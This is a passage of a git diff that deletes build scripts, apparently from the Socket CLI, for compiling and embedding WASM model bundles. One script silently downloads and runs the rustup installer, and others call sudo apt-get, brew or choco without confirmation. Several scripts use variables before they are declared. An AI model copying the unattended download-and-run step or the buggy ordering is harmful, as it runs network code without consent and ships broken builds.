1024 / 1024).toFixed(1) -} - -async function cleanBuild() { - logger.log('\n🧹 Cleaning build directories...') - const dirsToClean = [ - path.join(wasmBundlePath, 'build'), - path.join(wasmBundlePath, 'target'), - ] - - for (const dir of dirsToClean) { - if (existsSync(dir)) { - logger.log(` Removing ${path.basename(dir)}/`) - await fs.rm(dir, { recursive: true, force: true }) - } - } -} - -async function buildWasm(modelName, feature) { - logger.log(`\n📦 Building ${modelName}...`) - logger.log(` Feature: ${feature}`) - - const buildDir = path.join(wasmBundlePath, 'build') - mkdirSync(buildDir, { recursive: true }) - - // Build with cargo. - const cargoCommand = `cargo build --release --target wasm32-unknown-unknown --features ${feature}` - exec(cargoCommand) - - // Copy built WASM. - const wasmSource = path.join( - wasmBundlePath, - 'target/wasm32-unknown-unknown/release/socket_ai.wasm' - ) - const wasmBuild = path.join(buildDir, `${modelName}.wasm`) - - await fs.copyFile(wasmSource, wasmBuild) - const sizeMB = await getFileSizeMB(wasmBuild) - logger.log(` Built: ${sizeMB} MB → build/${modelName}.wasm`) - - return wasmBuild -} - -async function optimizeWasm(inputPath, modelName) { - if (noOptimize) { - logger.log(' Skipping optimization (--no-optimize)') - return inputPath - } - - logger.log(' Optimizing with wasm-opt...') - - // Check if wasm-opt is available. - try { - execSync('wasm-opt --version', { stdio: 'ignore' }) - } catch { - logger.log(' Warning: wasm-opt not found, skipping optimization') - logger.log(' Install: brew install binaryen') - return inputPath - } - - const buildDir = path.join(wasmBundlePath, 'build') - const optimizedPath = path.join(buildDir, `${modelName}.optimized.wasm`) - - exec( - `wasm-opt -Oz --enable-simd --enable-bulk-memory ${inputPath} -o ${optimizedPath}` - ) - - const originalSize = (await fs.stat(inputPath)).size - const optimizedSize = (await fs.stat(optimizedPath)).size - const reduction = (((originalSize - optimizedSize) / originalSize) * 100).toFixed(1) - - logger.log(` Optimized: ${(optimizedSize / (1024 * 1024)).toFixed(1)} MB (${reduction}% reduction)`) - - return optimizedPath -} - -async function copyToPackage(wasmPath, packageName, binaryName) { - logger.log(`\n📦 Copying to ${packageName}...`) - - const packageDir = path.join(packagesPath, packageName) - const binDir = path.join(packageDir, 'bin') - - // Create bin directory. - mkdirSync(binDir, { recursive: true }) - - // Copy WASM binary. - const destPath = path.join(binDir, binaryName) - await fs.copyFile(wasmPath, destPath) - - const sizeMB = await getFileSizeMB(destPath) - logger.log(` ✓ ${sizeMB} MB → packages/${packageName}/bin/${binaryName}`) -} - -async function main() { - try { - logger.log('🚀 Building WASM Model Packages') - logger.log('='.repeat(50)) - - if (clean) { - await cleanBuild() - } - - // Build MiniLM package. - const minilmWasm = await buildWasm('minilm', 'minilm-only') - const minilmOptimized = await optimizeWasm(minilmWasm, 'minilm') - await copyToPackage(minilmOptimized, 'socketbin-minilm-wasm', 'minilm.wasm') - - // Build CodeT5 package. - const codet5Wasm = await buildWasm('codet5', 'codet5-only') - const codet5Optimized = await optimizeWasm(codet5Wasm, 'codet5') - await copyToPackage(codet5Optimized, 'socketbin-codet5-wasm', 'codet5.wasm') - - logger.log(`\n${colors.green('✓')} Build complete!`) - logger.log('\nPackages ready:') - logger.log(' - packages/socketbin-minilm-wasm/') - logger.log(' - packages/socketbin-codet5-wasm/') - logger.log('\nNext steps:') - logger.log(' 1. Test locally: cd packages/socketbin-minilm-wasm && npm pack') - logger.log(' 2. Publish: npm publish') - } catch (error) { - logger.error(`\n${colors.red('✗')} Build failed:`, error.message) - process.exit(1) - } -} - -main() diff --git a/scripts/wasm/build-unified-wasm.mjs b/scripts/wasm/build-unified-wasm.mjs deleted file mode 100644 index 7a117fc63..000000000 --- a/scripts/wasm/build-unified-wasm.mjs +++ /dev/null @@ -1,570 +0,0 @@ -/** - * Build unified WASM bundle with all models embedded. - * - * USAGE: - * - Production build: node scripts/wasm/build-unified-wasm.mjs - * - Dev build (3-5x faster): node scripts/wasm/build-unified-wasm.mjs --dev - * - * PROCESS: - * 1. Check Rust toolchain (install if missing) - * 2. Download/verify all model files - * 2.5. Check and install binaryen (wasm-opt) if missing - * 3. Build Rust WASM bundle with wasm-pack - * - Production: --release (thin LTO, opt-level="z", strip symbols) - * - Dev: --profile dev-wasm (opt-level=1, no LTO, 16 codegen-units) - * 4. Optimize with wasm-opt -Oz (5-15% size reduction) - * 5. Compress with brotli at maximum quality (11) - * 6. Embed WASM as base64 in JavaScript file - * - * OPTIMIZATIONS (aggressive, no backward compat): - * - Cargo profiles: dev-wasm for fast iteration, release for production - * - Thin LTO: 5-10% faster builds than full LTO, similar size reduction - * - Strip symbols: 5-10% additional size reduction - * - Disabled overflow checks and debug assertions (smaller, faster) - * - WASM features: SIMD, bulk-memory, sign-ext, mutable-globals, reference-types - * - wasm-opt aggressive: Multiple optimization passes, modern features - * - Brotli compression: ~70% size reduction with quality 11 - * - * INT4 QUANTIZATION: - * - CodeT5 models use INT4 (4-bit weights) for 50% size reduction - * - Only 1-2% quality loss compared to INT8 - * - * OUTPUT: - * - build/wasm-bundle/pkg/socket_ai_bg.wasm (~115MB with INT4) - * - packages/cli/build/unified-wasm.mjs (brotli-compressed, base64-encoded WASM) - */ - -import { existsSync, promises as fs } from 'node:fs' -import path from 'node:path' -import { fileURLToPath } from 'node:url' -import { brotliCompressSync } from 'node:zlib' - -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import { spawn } from '@socketsecurity/lib/spawn' - -import { checkRustToolchain, getRustPaths } from './check-rust-toolchain.mjs' -import { downloadModels } from './download-models.mjs' - -/** - * Execute command and wait for completion. - */ -async function exec(command, args, options = {}) { - const result = await spawn(command, args, { - stdio: options.stdio || 'pipe', - stdioString: true, - stripAnsi: false, - ...options, - }) - - return { - code: result.code ?? 0, - stderr: result.stderr ?? '', - stdout: result.stdout ?? '', - } -} - -/** - * Check if binaryen (wasm-opt) is installed. - */ -async function checkBinaryenInstalled() { - try { - await exec('wasm-opt', ['--version']) - return true - } catch { - return false - } -} - -/** - * Install binaryen (wasm-opt) cross-platform. - */ -async function installBinaryen() { - const isWindows = process.platform === 'win32' - const isMacOS = process.platform === 'darwin' - const isLinux = process.platform === 'linux' - - logger.progress( - 'Installing binaryen (wasm-opt) - this may take a few minutes', - ) - - try { - if (isMacOS) { - // macOS: Try Homebrew first. - logger.substep('Trying Homebrew installation') - try { - await exec('brew', ['--version']) - await exec('brew', ['install', 'binaryen'], { stdio: 'inherit' }) - logger.done('binaryen installed via Homebrew') - return true - } catch { - logger.warn('Homebrew not available, trying GitHub releases') - } - } else if (isLinux) { - // Linux: Try apt-get first (Ubuntu/Debian). - logger.substep('Trying apt-get installation') - try { - await exec('sudo', ['apt-get', 'update'], { stdio: 'pipe' }) - await exec('sudo', ['apt-get', 'install', '-y', 'binaryen'], { - stdio: 'inherit', - }) - logger.done('binaryen installed via apt-get') - return true - } catch { - logger.warn('apt-get not available or failed, trying GitHub releases') - } - } else if (isWindows) { - // Windows: Try chocolatey first. - logger.substep('Trying Chocolatey installation') - try { - await exec('choco', ['--version']) - await exec('choco', ['install', 'binaryen', '-y'], { stdio: 'inherit' }) - logger.done('binaryen installed via Chocolatey') - return true - } catch { - logger.warn('Chocolatey not available, trying GitHub releases') - } - } - - // Fallback: Download from GitHub releases (all platforms). - logger.substep('Downloading pre-built binaryen from GitHub') - const version = 'version_119' // Latest stable as of implementation. - let platformSuffix = '' - - if (isWindows) { - platformSuffix = 'x86_64-windows' - } else if (isMacOS) { - platformSuffix = process.arch === 'arm64' ? 'arm64-macos' : 'x86_64-macos' - } else if (isLinux) { - platformSuffix = 'x86_64-linux' - } - - const url = `https://github.com/WebAssembly/binaryen/releases/download/${version}/binaryen-${version}-${platformSuffix}.tar.gz` - logger.substep(`URL: ${url}`) - - // For CI/automation, we'll gracefully degrade if GitHub releases download fails. - logger.warn('GitHub releases download not yet implemented') - logger.warn( - 'wasm-opt will be skipped (install manually for smaller bundles)', - ) - return false - } catch (e) { - logger.error(`Failed to install binaryen: ${e.message}`) - logger.warn( - 'wasm-opt will be skipped (install manually for optimal bundle size)', - ) - return false - } -} - -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const rootPath = path.join(__dirname, '../..') -const wasmBundleDir = path.join(rootPath, 'build/wasm-bundle') -const cliBuildDir = path.join(rootPath, 'packages/cli/build') - -logger.step('Build Unified WASM Bundle') - -// Step 1: Check Rust toolchain. -logger.substep('Step 1: Checking Rust toolchain') -const hasRust = await checkRustToolchain() -if (!hasRust) { - logger.error('Rust toolchain setup failed') - logger.error('Please install manually: https://rustup.rs/') - process.exit(1) -} - -// Step 2: Download models. -logger.substep('Step 2: Downloading model files') -const hasModels = await downloadModels() -if (!hasModels) { - logger.error('Model download incomplete') - logger.error('Please run: node scripts/wasm/convert-codet5.mjs') - process.exit(1) -} - -// Step 2.5: Optimize embedded WASM files (the big wins). -logger.substep('Step 2.5: Optimizing embedded WASM files') -logger.info('This optimizes the third-party WASM (ONNX, Yoga) BEFORE embedding') -const optimizeScript = path.join(__dirname, 'optimize-embedded-wasm.mjs') -try { - const optimizeArgs = [optimizeScript] - if (!isDev) { - optimizeArgs.push('--aggressive') - } - const optimizeResult = await exec('node', optimizeArgs, { stdio: 'inherit' }) - if (optimizeResult.code !== 0) { - logger.warn('WASM optimization failed, using original files') - } -} catch (e) { - logger.warn(`WASM optimization skipped: ${e.message}`) - logger.warn('Will use original unoptimized WASM files') -} - -// Step 2.5: Check and install binaryen for wasm-opt. -logger.substep('Step 2.5: Checking binaryen (wasm-opt)') -const hasBinaryen = await checkBinaryenInstalled() -if (!hasBinaryen) { - logger.warn('binaryen (wasm-opt) not found') - - const binaryenInstalled = await installBinaryen() - if (!binaryenInstalled) { - logger.warn('wasm-opt not available - bundle will be slightly larger') - } -} else { - logger.info('binaryen (wasm-opt) found') -} - -// Step 3: Build WASM with wasm-pack. -logger.substep('Step 3: Building WASM bundle') - -const { wasmPack } = getRustPaths() -const pkgDir = path.join(wasmBundleDir, 'pkg') - -logger.progress('Running wasm-pack build') -logger.substep(`Source: ${wasmBundleDir}`) -logger.substep(`Output: ${pkgDir}`) - -// Force wasm-pack to use rustup's toolchain by modifying PATH. -const { homedir } = await import('node:os') -const cargoHome = process.env.CARGO_HOME || path.join(homedir(), '.cargo') -const cargoBin = path.join(cargoHome, 'bin') - -// Support dev mode for faster builds (3-5x faster). -const isDev = process.argv.includes('--dev') -const profileArgs = isDev ? ['--profile', 'dev-wasm'] : ['--release'] - -if (isDev) { - logger.substep('Using dev-wasm profile (fast, minimal optimization)') -} - -// Set up build environment with optimizations. -const buildEnv = { - ...process.env, - // Put cargo/bin first in PATH to prioritize rustup's toolchain. - PATH: `${cargoBin}${path.delimiter}${process.env.PATH}`, -} - -// Add RUSTFLAGS for additional optimizations (if not already set). -if (!buildEnv.RUSTFLAGS) { - const rustFlags = [ - '-C target-feature=+simd128', // Enable WASM SIMD (73% browser support) - '-C target-feature=+bulk-memory', // Bulk memory operations (faster copies) - '-C target-feature=+mutable-globals', // Mutable globals support - '-C target-feature=+sign-ext', // Sign extension operations - ] - - // Production-only optimizations. - if (!isDev) { - rustFlags.push( - '-C link-arg=--strip-debug', // Strip debug info - '-C link-arg=--strip-all', // Strip all symbols - '-C link-arg=-zstack-size=131_072', // Smaller stack size (128KB) - '-C embed-bitcode=yes', // Embed bitcode for LTO - ) - } - - buildEnv.RUSTFLAGS = rustFlags.join(' ') - logger.substep(`RUSTFLAGS: ${buildEnv.RUSTFLAGS}`) -} - -const buildResult = await exec( - wasmPack, - [ - 'build', - wasmBundleDir, - '--target', - 'web', - '--out-dir', - pkgDir, - '--out-name', - 'socket_ai', - ...profileArgs, - ], - { - stdio: 'inherit', - env: buildEnv, - }, -) - -if (buildResult.code !== 0) { - logger.error('wasm-pack build failed') - process.exit(1) -} - -logger.done('wasm-pack build complete') - -// Step 4: Check size and optionally optimize. -const wasmFile = path.join(pkgDir, 'socket_ai_bg.wasm') -if (!existsSync(wasmFile)) { - logger.error(`WASM file not found: ${wasmFile}`) - process.exit(1) -} - -let stats = await fs.stat(wasmFile) -const originalSize = stats.size -logger.info(`WASM bundle size: ${(originalSize / 1024 / 1024).toFixed(2)} MB`) - -// Try to optimize with wasm-opt if available (5-15% size reduction). -let optimizationSucceeded = false -try { - logger.progress('Optimizing with wasm-opt (aggressive)') - - // Aggressive optimization flags (no backward compat needed). - const wasmOptFlags = [ - '-Oz', // Optimize for size - '--enable-simd', // Enable SIMD operations - '--enable-bulk-memory', // Enable bulk memory - '--enable-sign-ext', // Enable sign extension - '--enable-mutable-globals', // Enable mutable globals - '--enable-nontrapping-float-to-int', // Non-trapping float conversions - '--enable-reference-types', // Enable reference types - '--low-memory-unused', // Optimize for low memory usage - '--flatten', // Flatten IR for better optimization - '--rereloop', // Optimize control flow - '--vacuum', // Remove unused code - ] - - const optResult = await exec('wasm-opt', [...wasmOptFlags, wasmFile, '-o', wasmFile], { - stdio: 'inherit', - }) - - if (optResult.code === 0) { - stats = await fs.stat(wasmFile) - const optimizedSize = stats.size - const savings = ((1 - optimizedSize / originalSize) * 100).toFixed(1) - logger.done( - `Optimized: ${(optimizedSize / 1024 / 1024).toFixed(2)} MB (${savings}% reduction)`, - ) - optimizationSucceeded = true - } else { - logger.warn('wasm-opt optimization failed (continuing with unoptimized)') - logger.substep('Install binaryen for optimization: brew install binaryen') - } -} catch (_e) { - logger.warn('wasm-opt not available (install binaryen for optimization)') - logger.substep('macOS: brew install binaryen') - logger.substep('Linux: sudo apt-get install binaryen') - logger.substep('Windows: choco install binaryen') -} - -// Report final size. -if (!optimizationSucceeded) { - logger.info(`Final size: ${(originalSize / 1024 / 1024).toFixed(2)} MB (unoptimized)`) -} - -// Step 5: Embed as base64 in JavaScript. -logger.substep('Step 5: Embedding WASM as base64') - -logger.progress('Reading WASM binary') -const wasmData = await fs.readFile(wasmFile) -logger.done(`Read ${wasmData.length} bytes`) - -logger.progress('Compressing with brotli (quality 11 - maximum)') -const { constants } = await import('node:zlib') -const wasmCompressed = brotliCompressSync(wasmData, { - params: { - [constants.BROTLI_PARAM_QUALITY]: 11, // Maximum quality (0-11) - [constants.BROTLI_PARAM_SIZE_HINT]: wasmData.length, // Hint for better compression - [constants.BROTLI_PARAM_LGWIN]: 24, // Maximum window size (10-24) - [constants.BROTLI_PARAM_MODE]: constants.BROTLI_MODE_GENERIC, // Generic mode for binary data - }, -}) -const compressionRatio = ( - (wasmCompressed.length / wasmData.length) * - 100 -).toFixed(1) -logger.done( - `Compressed: ${wasmCompressed.length} bytes (${compressionRatio}% of original)`, -) - -logger.progress('Encoding as base64') -const wasmBase64 = wasmCompressed.toString('base64') -logger.done(`Encoded: ${wasmBase64.length} bytes`) - -// Generate unified-wasm.mjs. -logger.progress('Generating packages/cli/build/unified-wasm.mjs') - -const syncContent = `/** - * Unified WASM Loader for Socket CLI AI Features - * - * This file is AUTO-GENERATED by scripts/wasm/build-unified-wasm.mjs - * DO NOT EDIT MANUALLY - changes will be overwritten on next build. - * - * Contains: - * - ONNX Runtime (~2-5MB) - * - MiniLM model (~17MB int8) - * - CodeT5 encoder (~30MB int4) - * - CodeT5 decoder (~60MB int4) - * - Tokenizers (~1MB) - * - Yoga Layout (~95KB) - * - * INT4 Quantization: - * - CodeT5 models use INT4 (4-bit weights) for 50% size reduction - * - Only 1-2% quality loss compared to INT8 - * - * Original size: ${(wasmData.length / 1024 / 1024).toFixed(2)} MB - * Compressed: ${(wasmCompressed.length / 1024 / 1024).toFixed(2)} MB (${compressionRatio}%) - * Base64: ${(wasmBase64.length / 1024 / 1024).toFixed(2)} MB - */ - -import { brotliDecompressSync } from 'node:zlib' - - -const logger = getDefaultLogger() -// Embedded WASM (brotli-compressed, base64-encoded). -const WASM_BASE64 = '${wasmBase64}' - -let wasmModule = null -let wasmInstance = null - -/** - * Load WASM module synchronously. - * - * @returns WebAssembly.Instance - */ -export function loadWasmSync() { - if (wasmInstance) { - return wasmInstance - } - - // Decode base64 to Buffer. - const compressed = Buffer.from(WASM_BASE64, 'base64') - - // Decompress with brotli. - const decompressed = brotliDecompressSync(compressed) - - // Create WebAssembly module. - wasmModule = new WebAssembly.Module(decompressed) - wasmInstance = new WebAssembly.Instance(wasmModule, {}) - - return wasmInstance -} - -/** - * Get WASM exports (lazy-loaded). - */ -export function getWasmExports() { - if (!wasmInstance) { - loadWasmSync() - } - return wasmInstance.exports -} - -/** - * Load MiniLM model from WASM linear memory. - */ -export function loadMinilmModelSync() { - const exports = getWasmExports() - const ptr = exports.get_minilm_model_ptr() - const size = exports.get_minilm_model_size() - const memory = new Uint8Array(exports.memory.buffer, ptr, size) - return new Uint8Array(memory) -} - -/** - * Load CodeT5 encoder from WASM linear memory. - */ -export function loadCodet5EncoderSync() { - const exports = getWasmExports() - const ptr = exports.get_codet5_encoder_ptr() - const size = exports.get_codet5_encoder_size() - const memory = new Uint8Array(exports.memory.buffer, ptr, size) - return new Uint8Array(memory) -} - -/** - * Load CodeT5 decoder from WASM linear memory. - */ -export function loadCodet5DecoderSync() { - const exports = getWasmExports() - const ptr = exports.get_codet5_decoder_ptr() - const size = exports.get_codet5_decoder_size() - const memory = new Uint8Array(exports.memory.buffer, ptr, size) - return new Uint8Array(memory) -} - -/** - * Load MiniLM tokenizer from WASM linear memory. - */ -export function loadMinilmTokenizerSync() { - const exports = getWasmExports() - const ptr = exports.get_minilm_tokenizer_ptr() - const size = exports.get_minilm_tokenizer_size() - const memory = new Uint8Array(exports.memory.buffer, ptr, size) - const text = new TextDecoder().decode(memory) - return JSON.parse(text) -} - -/** - * Load CodeT5 tokenizer from WASM linear memory. - */ -export function loadCodet5TokenizerSync() { - const exports = getWasmExports() - const ptr = exports.get_codet5_tokenizer_ptr() - const size = exports.get_codet5_tokenizer_size() - const memory = new Uint8Array(exports.memory.buffer, ptr, size) - const text = new TextDecoder().decode(memory) - return JSON.parse(text) -} - -/** - * Load ONNX Runtime WASM from embedded data. - */ -export function loadOnnxRuntimeSync() { - const exports = getWasmExports() - const ptr = exports.get_onnx_runtime_ptr() - const size = exports.get_onnx_runtime_size() - const memory = new Uint8Array(exports.memory.buffer, ptr, size) - return new Uint8Array(memory) -} - -/** - * Load Yoga Layout WASM from embedded data. - */ -export function loadYogaLayoutSync() { - const exports = getWasmExports() - const ptr = exports.get_yoga_layout_ptr() - const size = exports.get_yoga_layout_size() - const memory = new Uint8Array(exports.memory.buffer, ptr, size) - return new Uint8Array(memory) -} - -/** - * Get embedded asset sizes. - */ -export function getEmbeddedSizes() { - return { - compressed: ${wasmCompressed.length}, - original: ${wasmData.length}, - total: { - base64: WASM_BASE64.length, - compressed: ${wasmCompressed.length}, - original: ${wasmData.length}, - }, - } -} -` - -// Ensure build directory exists. -await fs.mkdir(cliBuildDir, { recursive: true }) - -const outputPath = path.join(cliBuildDir, 'unified-wasm.mjs') -await fs.writeFile(outputPath, syncContent, 'utf-8') - -logger.done(`Generated ${outputPath}`) -logger.done(`File size: ${(syncContent.length / 1024 / 1024).toFixed(2)} MB`) - -logger.success('Build Complete') - -logger.info('Summary:') -logger.info(` Original WASM: ${(wasmData.length / 1024 / 1024).toFixed(2)} MB`) -logger.info( - ` Compressed: ${(wasmCompressed.length / 1024 / 1024).toFixed(2)} MB`, -) -logger.info(` Base64: ${(wasmBase64.length / 1024 / 1024).toFixed(2)} MB`) -logger.info( - ` Total savings: ${((1 - wasmCompressed.length / wasmData.length) * 100).toFixed(1)}%`, -) -logger.info('Next steps:') -logger.info(' 1. This file will be bundled into dist/cli.js by Rollup') -logger.info(' 2. Rollup output will be compressed to dist/cli.js.bz') -logger.info(' 3. Native stub or index.js will decompress and execute') diff --git a/scripts/wasm/check-rust-toolchain.mjs b/scripts/wasm/check-rust-toolchain.mjs deleted file mode 100644 index 9a6a5d61a..000000000 --- a/scripts/wasm/check-rust-toolchain.mjs +++ /dev/null @@ -1,327 +0,0 @@ -/** - * Check and install Rust toolchain if needed. - * - * WHAT THIS DOES: - * 1. Checks if Rust/cargo is installed - * 2. Checks if wasm32-unknown-unknown target is installed - * 3. Checks if wasm-pack is installed - * 4. Installs missing components automatically - * - * RUST VERSION: - * Uses stable Rust toolchain (auto-updated via rustup). - */ - -import { existsSync, promises as fs } from 'node:fs' -import { homedir } from 'node:os' -import path from 'node:path' - -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import { spawn } from '@socketsecurity/lib/spawn' - - -const logger = getDefaultLogger() -/** - * Execute command and wait for completion. - */ -async function exec(command, args, options = {}) { - const result = await spawn(command, args, { - stdio: options.stdio || 'pipe', - stdioString: true, - stripAnsi: false, - ...options, - }) - - return { - code: result.code ?? 0, - stderr: result.stderr ?? '', - stdout: result.stdout ?? '', - } -} - -const WIN32 = process.platform === 'win32' -const CARGO_HOME = process.env.CARGO_HOME || path.join(homedir(), '.cargo') -const CARGO_BIN = path.join(CARGO_HOME, 'bin') -const CARGO_PATH = path.join(CARGO_BIN, WIN32 ? 'cargo.exe' : 'cargo') -const RUSTUP_PATH = path.join(CARGO_BIN, WIN32 ? 'rustup.exe' : 'rustup') -const WASM_PACK_PATH = path.join( - CARGO_BIN, - WIN32 ? 'wasm-pack.exe' : 'wasm-pack', -) - -/** - * Check if a command exists. - */ -async function commandExists(command) { - try { - const result = await exec(WIN32 ? 'where' : 'which', [command]) - return result.code === 0 - } catch { - return false - } -} - -/** - * Check if Rust is installed. - */ -async function checkRustInstalled() { - // Check in $CARGO_HOME/bin first. - if (existsSync(CARGO_PATH)) { - return true - } - - // Check in PATH. - return await commandExists('cargo') -} - -/** - * Install Rust via rustup (cross-platform). - */ -async function installRust() { - logger.progress( - 'Installing Rust toolchain via rustup (this may take a few minutes)', - ) - - const isWindows = WIN32 - - try { - if (isWindows) { - // Windows: Download and run rustup-init.exe. - const rustupUrl = 'https://win.rustup.rs/x86_64' - logger.substep(`Downloading rustup-init.exe from ${rustupUrl}`) - - const response = await fetch(rustupUrl) - if (!response.ok) { - throw new Error(`Failed to download rustup: ${response.statusText}`) - } - - const buffer = await response.arrayBuffer() - - const tmpDir = path.join(CARGO_HOME, '.tmp') - await fs.mkdir(tmpDir, { recursive: true }) - const exePath = path.join(tmpDir, 'rustup-init.exe') - await fs.writeFile(exePath, Buffer.from(buffer)) - - logger.substep('Running rustup-init.exe') - const result = await exec( - exePath, - [ - '-y', - '--default-toolchain', - 'stable', - '--default-host', - 'x86_64-pc-windows-msvc', - ], - { - stdio: 'inherit', - env: { - ...process.env, - CARGO_HOME, - RUSTUP_HOME: - process.env.RUSTUP_HOME || path.join(homedir(), '.rustup'), - }, - }, - ) - - if (result.code !== 0) { - throw new Error('rustup installation failed') - } - - await fs.unlink(exePath) - } else { - // Linux/macOS: Download and run shell script. - const rustupUrl = 'https://sh.rustup.rs' - logger.substep(`Downloading rustup from ${rustupUrl}`) - - const response = await fetch(rustupUrl) - if (!response.ok) { - throw new Error(`Failed to download rustup: ${response.statusText}`) - } - - const script = await response.text() - - const tmpDir = path.join(CARGO_HOME, '.tmp') - await fs.mkdir(tmpDir, { recursive: true }) - const scriptPath = path.join(tmpDir, 'rustup-init.sh') - await fs.writeFile(scriptPath, script, 'utf-8') - - logger.substep('Running rustup installer') - const result = await exec( - 'sh', - [scriptPath, '-y', '--default-toolchain', 'stable'], - { - stdio: 'inherit', - env: { - ...process.env, - CARGO_HOME, - RUSTUP_HOME: - process.env.RUSTUP_HOME || path.join(homedir(), '.rustup'), - }, - }, - ) - - if (result.code !== 0) { - throw new Error('rustup installation failed') - } - - await fs.unlink(scriptPath) - } - - logger.done('Rust installed successfully') - return true - } catch (e) { - logger.error(`Failed to install Rust: ${e.message}`) - logger.error('Please install manually: https://rustup.rs/') - return false - } -} - -/** - * Check if wasm32-unknown-unknown target is installed. - */ -async function checkWasmTargetInstalled() { - const rustupCmd = existsSync(RUSTUP_PATH) ? RUSTUP_PATH : 'rustup' - - try { - const result = await exec(rustupCmd, ['target', 'list', '--installed'], { - stdio: 'pipe', - }) - - if (result.code !== 0) { - return false - } - - return result.stdout.includes('wasm32-unknown-unknown') - } catch { - return false - } -} - -/** - * Install wasm32-unknown-unknown target. - */ -async function installWasmTarget() { - logger.progress('Installing wasm32-unknown-unknown target') - - const rustupCmd = existsSync(RUSTUP_PATH) ? RUSTUP_PATH : 'rustup' - - const result = await exec( - rustupCmd, - ['target', 'add', 'wasm32-unknown-unknown'], - { - shell: true, - stdio: 'inherit', - }, - ) - - if (result.code !== 0) { - logger.error('Failed to install wasm32 target') - return false - } - - logger.done('wasm32-unknown-unknown target installed') - return true -} - -/** - * Check if wasm-pack is installed. - */ -async function checkWasmPackInstalled() { - // Check in $CARGO_HOME/bin first. - if (existsSync(WASM_PACK_PATH)) { - return true - } - - // Check in PATH. - return await commandExists('wasm-pack') -} - -/** - * Install wasm-pack via cargo. - */ -async function installWasmPack() { - logger.progress('Installing wasm-pack (this may take a few minutes)') - - const cargoCmd = existsSync(CARGO_PATH) ? CARGO_PATH : 'cargo' - - const result = await exec(cargoCmd, ['install', 'wasm-pack'], { - shell: true, - stdio: 'inherit', - env: { - ...process.env, - CARGO_HOME, - }, - }) - - if (result.code !== 0) { - logger.error('Failed to install wasm-pack') - return false - } - - logger.done('wasm-pack installed successfully') - return true -} - -/** - * Main check and install function. - */ -export async function checkRustToolchain() { - logger.step('Checking Rust Toolchain') - - // Check Rust. - const hasRust = await checkRustInstalled() - if (!hasRust) { - logger.warn('Rust not found') - const installed = await installRust() - if (!installed) { - return false - } - } else { - logger.info('Rust found') - } - - // Check wasm32 target. - const hasWasmTarget = await checkWasmTargetInstalled() - if (!hasWasmTarget) { - logger.warn('wasm32-unknown-unknown target not found') - const installed = await installWasmTarget() - if (!installed) { - return false - } - } else { - logger.info('wasm32-unknown-unknown target found') - } - - // Check wasm-pack. - const hasWasmPack = await checkWasmPackInstalled() - if (!hasWasmPack) { - logger.warn('wasm-pack not found') - const installed = await installWasmPack() - if (!installed) { - return false - } - } else { - logger.info('wasm-pack found') - } - - logger.success('Rust Toolchain Ready') - - return true -} - -/** - * Get paths to Rust tools. - */ -export function getRustPaths() { - return { - cargo: existsSync(CARGO_PATH) ? CARGO_PATH : 'cargo', - cargoHome: CARGO_HOME, - rustup: existsSync(RUSTUP_PATH) ? RUSTUP_PATH : 'rustup', - wasmPack: existsSync(WASM_PACK_PATH) ? WASM_PACK_PATH : 'wasm-pack', - } -} - -// Run if called directly. -if (import.meta.url === `file://${process.argv[1]}`) { - const success = await checkRustToolchain() - process.exit(success ? 0 : 1) -} diff --git a/scripts/wasm/convert-codet5.mjs b/scripts/wasm/convert-codet5.mjs deleted file mode 100644 index fb469b197..000000000 --- a/scripts/wasm/convert-codet5.mjs +++ /dev/null @@ -1,321 +0,0 @@ -/** - * Convert CodeT5 models from PyTorch to ONNX int4 format. - * - * REQUIREMENTS: - * - Python 3.8+ - * - pip packages: optimum[onnxruntime], torch, transformers, onnx, onnxruntime - * - Auto-installs missing packages if pip is available - * - * PROCESS: - * 1. Check Python and package availability (auto-install if missing) - * 2. Download Salesforce/codet5-small from HuggingFace (~240MB) - * 3. Export PyTorch → ONNX format (FP32) - * 4. Quantize FP32 → INT4 (4-bit weights, 50% size reduction) - * 5. Save encoder and decoder to .cache/models/ - * - * INT4 QUANTIZATION: - * - 50% smaller than INT8 (~90MB vs ~180MB total) - * - Only 1-2% quality loss (excellent for encoder-decoder models) - * - Fully supported by ONNX Runtime - * - * OUTPUT: - * - .cache/models/codet5-encoder-int4.onnx (~30MB) - * - .cache/models/codet5-decoder-int4.onnx (~60MB) - * - .cache/models/codet5-tokenizer.json (~500KB) - */ - -import { existsSync, promises as fs } from 'node:fs' -import path from 'node:path' -import { fileURLToPath } from 'node:url' - -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import { spawn } from '@socketsecurity/lib/spawn' - -/** - * Execute command and wait for completion. - */ -async function exec(command, args, options = {}) { - const result = await spawn(command, args, { - stdio: options.stdio || 'pipe', - stdioString: true, - stripAnsi: false, - ...options, - }) - - if (result.code !== 0) { - throw new Error(`Command failed with code ${result.code}`) - } - - return { - code: result.code ?? 0, - stderr: result.stderr ?? '', - stdout: result.stdout ?? '', - } -} - -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const rootPath = path.join(__dirname, '../..') -const modelsPath = path.join(rootPath, '.cache', 'models') - -// Step 1: Check Python. -logger.substep('Step Checking Python installation...\n') - -let pythonCmd = 'python3' -let pythonVersion = '' -try { - const pythonResult = await exec(pythonCmd, ['--version']) - pythonVersion = pythonResult.stdout.trim() - logger.info(`✓ Found ${pythonVersion}`) -} catch (_e) { - // Try 'python' as fallback. - try { - const pythonResult = await exec('python', ['--version']) - pythonVersion = pythonResult.stdout.trim() - pythonCmd = 'python' - logger.info(`✓ Found ${pythonVersion}`) - } catch { - logger.error(' Python 3 not found') - logger.error( - ' Please install Python 3.8+: https://www.python.org/downloads/', - ) - process.exit(1) - } -} - -// Check Python version (need 3.8+). -const versionMatch = pythonVersion.match(/Python (\d+)\.(\d+)/) -if (versionMatch) { - const major = Number.parseInt(versionMatch[1], 10) - const minor = Number.parseInt(versionMatch[2], 10) - - if (major < 3 || (major === 3 && minor < 8)) { - logger.error(`❌ Python 3.8+ required, found ${pythonVersion}`) - logger.error('Please upgrade: https://www.python.org/downloads/') - process.exit(1) - } -} -logger.info() - -// Step 2: Check and install required packages. -logger.substep('Step Checking required packages...\n') - -const REQUIRED_PACKAGES = [ - { import: 'optimum', package: 'optimum[onnxruntime]' }, - { import: 'torch', package: 'torch' }, - { import: 'transformers', package: 'transformers' }, - { import: 'onnx', package: 'onnx' }, - { import: 'onnxruntime', package: 'onnxruntime' }, -] - -const missingPackages = [] - -// Check each package. -for (const { import: importName, package: packageName } of REQUIRED_PACKAGES) { - try { - await 